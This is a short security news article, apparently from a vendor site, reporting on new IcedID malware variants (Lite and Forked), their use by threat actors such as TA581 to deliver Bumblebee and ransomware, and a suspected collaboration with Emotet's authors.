HQ/EMEAFind out how we can help your business
The IcedID malware has new variants specialising in payload delivery instead of online banking fraud campaigns. Reports show several threat actors have adopted the newly emerged variants in seven cybercriminal operations since last year. Researchers explained that the variant had delivered chiefly ransomware.
The first identified IcedID malware variant is Lite.
According to investigations, the IcedID malware variant, Lite, initially appeared in November last year. This variant became a second-stage payload on infected systems of the Emotet malware.
Analysts revealed that Lite uses a hardcoded static URL to download a compromised file containing a DLL loader. However, this variant does not have a command-and-control server; hence, it does not exfiltrate data about the compromised device.
Last month, the newly emerged TA581 cybercriminal group used the IcedID’s Forked version. The version does not include banking fraud functionality like backconnect and web injects. Instead, the group used the variant as an initial access broker to deploy the Bumblebee malware.
Moreover, the Forked IcedID operators utilise MS OneNote attachments and unusual files with [.]URL extension to deceive victims. However, this variant uses the standard IcedID payload to contact a command-and-control server to download a DLL.
These new variants show that malware developers are constantly putting upgrades on IcedID. Hence, many threat actors will likely use the IcedID malware to increase the efficiency of their attacks. Furthermore, hackers will have a primary weapon for deploying payloads that could result in more widespread ransomware distribution.
On the other hand, researchers claim that the original authors of Emotet may have banded with IcedID operators to improve its capabilities further. The bases of this belief are the codebase, timeline, and correlation with the recent Emote infections worldwide.
The cooperation of Emotet and IcedID authors could also develop newer variants with more infectious capabilities.
The new IcedID malware variants have shown everyone that these authors could create weapons specialising in a single purpose. Therefore, analysts and researchers should also be more vigilant about these attacks to develop more proactive countermeasures for these threats.
